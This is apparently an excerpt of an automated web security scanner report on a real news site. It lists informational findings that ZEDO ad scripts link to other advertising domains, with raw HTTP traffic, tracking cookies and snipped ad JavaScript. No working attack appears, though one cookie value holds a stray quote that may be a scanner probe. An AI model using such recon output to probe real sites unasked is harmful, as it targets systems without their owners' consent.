FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644|0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1; PI=h1037004Za883603Zc826000187,826000187Zs173Zt129

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:826,196642|0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1;expires=Mon, 28 Feb 2011 14:31:35 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,187,9:951,10,9:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1;expires=Mon, 28 Feb 2011 14:31:36 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=48
Expires: Sat, 29 Jan 2011 14:32:24 GMT
Date: Sat, 29 Jan 2011 14:31:36 GMT
Connection: close
Content-Length: 4384

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='';var zzCusto
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/APM/iview/267856417/direct;wi.300;hi.250/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=883601%3Bn=826%3Bx=2333%3Bc=826000187,826000187%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=0%3Bss=2%3Bsi=0%3Bse=1%3Bp%3D8%3Bf%3D1077676%3Bh%3D1037004%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

17.172. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=7&q=&$=&s=2&z=0.23845157260075212 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle&page=bh.heraldinteractive.com/blogs/news/lone_republican
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; aps=2; ZFFAbh=749B826,20|1483_759#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196647,196646:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:14,26,1:14,26,1; PI=h1037004Za883604Zc826000187,826000187Zs173Zt128; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792#580303|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:2,26,1:0,26,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196641:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:14,26,1:14,26,1;expires=Mon, 28 Feb 2011 13:39:46 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,187,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021|0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1;expires=Mon, 28 Feb 2011 13:39:46 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=54
Expires: Sat, 29 Jan 2011 13:40:41 GMT
Date: Sat, 29 Jan 2011 13:39:47 GMT
Connection: close
Content-Length: 4385

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='';var zzCusto
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/APM/iview/267856416/direct;wi.160;hi.600/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=883600%3Bn=826%3Bx=1821%3Bc=826000187,826000187%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=2%3Bss=2%3Bsi=0%3Bse=1%3Bp%3D8%3Bf%3D1077676%3Bh%3D1037004%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="160" height="600">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

17.173. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=9&q=&$=&s=2&z=0.31822958169505 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle2&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFgeo=5386156; FFpb=1220:4f791'; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1; FFcat=826,187,9:951,7,9:1220,101,9; FFad=0:0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777,2#776116|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1;expires=Sun, 27 Feb 2011 21:57:31 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,187,9:951,2,9:951,7,9:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:0:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=249
Expires: Fri, 28 Jan 2011 22:01:40 GMT
Date: Fri, 28 Jan 2011 21:57:31 GMT
Connection: close
Content-Length: 2167

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='';var zzCusto
...[SNIP]...
</span>")
document.write('<script language="JavaScript" src="http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience;sz=300x250;ord=' + Math.random() + '?" type="text/javascript"><\/script>
...[SNIP]...

17.174. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /bar/v16-401/d3/jsc/fm.js?c=11/2&a=0&f=&n=951&r=13&d=14&q=&$=&s=2&z=0.45605201134458184 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; ZCBC=1; aps=2; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:14,26,1:14,26,1; FFpb=1220:4f791'$951:spectrum728x90,burst728x90,appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250; FFcat=826,187,9:951,7,9:951,2,9:826,187,14:951,7,14:951,11,14:951,2,14:826,187,7:951,7,7:1220,101,9; FFad=52:27:24:34:14:16:2:1:1:0; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792#580303|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:38,26,1:24,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:2,26,1:0,26,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791'$951:spectrum728x90,burst728x90,appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,14:951,11,14:826,187,9:951,7,9:951,2,9:951,7,14:951,2,14:826,187,7:951,7,7:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=35:17:52:27:24:14:2:1:1:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196647,196644:951,125046,131022,131021|0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:14,26,1:14,26,1;expires=Mon, 28 Feb 2011 02:23:22 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196647:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:14,26,1:14,26,1;expires=Mon, 28 Feb 2011 02:23:22 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=66
Expires: Sat, 29 Jan 2011 02:24:28 GMT
Date: Sat, 29 Jan 2011 02:23:22 GMT
Connection: close
Content-Length: 4588

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='spectrum728x
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/APM/iview/267856421/direct;wi.728;hi.90/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=883605%3Bn=826%3Bx=3613%3Bc=826000187,826000187%3Bg=172%3Bi=17%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=17%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=0%3Bss=2%3Bsi=17%3Bse=1%3Bp%3D8%3Bf%3D1077677%3Bh%3D1037004%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

17.175. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /bar/v16-401/d3/jsc/fm.js?c=7/2&a=0&f=&n=951&r=13&d=14&q=&$=&s=2&z=0.7758457127492875 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; ZCBC=1; aps=2; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:14,26,1:14,26,1; FFpb=1220:4f791'$951:spectrum728x90,burst728x90,appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250; FFcat=826,187,9:951,7,9:951,2,9:826,187,14:951,7,14:951,11,14:951,2,14:826,187,7:951,7,7:1220,101,9; FFad=52:27:24:34:14:16:2:1:1:0; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792#580303|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:38,26,1:24,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:2,26,1:0,26,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791'$951:spectrum728x90,burst728x90,appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,14:951,7,14:826,187,9:951,7,9:951,2,9:951,11,14:951,2,14:826,187,7:951,7,7:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=35:15:52:27:24:16:2:1:1:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196647,196644:951,125046,131022,131021|0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:14,26,1:14,26,1;expires=Mon, 28 Feb 2011 02:23:23 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196647:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:14,26,1:14,26,1;expires=Mon, 28 Feb 2011 02:23:23 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=66
Expires: Sat, 29 Jan 2011 02:24:29 GMT
Date: Sat, 29 Jan 2011 02:23:23 GMT
Connection: close
Content-Length: 4615

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='spectrum728x
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/APM/iview/267856421/direct;wi.728;hi.90/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=883605%3Bn=826%3Bx=3613%3Bc=826000187,826000187%3Bg=172%3Bi=15%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=15%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=0%3Bss=2%3Bsi=15%3Bse=1%3Bp%3D8%3Bf%3D1077677%3Bh%3D1037004%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

17.176. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=14&q=&$=realmedia728x90&s=2&z=0.688481671968475 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; ZCBC=1; FFgeo=5386156; aps=2; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1; ZFFAbh=749B826,20|1483_759#365; FFpb=1220:4f791'$951:audiencescience300x250,spectrum300x250,ibnetwork300x250; FFcat=826,187,9:951,2,9:826,187,14:951,11,14:951,7,9:951,7,14:826,187,7:951,7,7:1220,101,9; FFad=12:5:6:2:6:3:1:1:0; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:4,26,1:2,26,1:0,26,1:0,27,2:0,26,1:2,26,1:2,26,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791'$951:realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,14:951,2,14:826,187,9:951,2,9:951,11,14:951,7,9:951,7,14:826,187,7:951,7,7:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=7:0:12:5:2:6:3:1:1:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:4,26,1:2,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:2,26,1;expires=Sun, 27 Feb 2011 22:39:45 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=155
Expires: Fri, 28 Jan 2011 22:42:20 GMT
Date: Fri, 28 Jan 2011 22:39:45 GMT
Connection: close
Content-Length: 2306

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='realmedia728
...[SNIP]...
</span>")
document.write('<script language="JavaScript" src="http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience;sz=728x90;ord=' + Math.random() + '?" type="text/javascript"><\/script>
...[SNIP]...

17.177. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

Summary

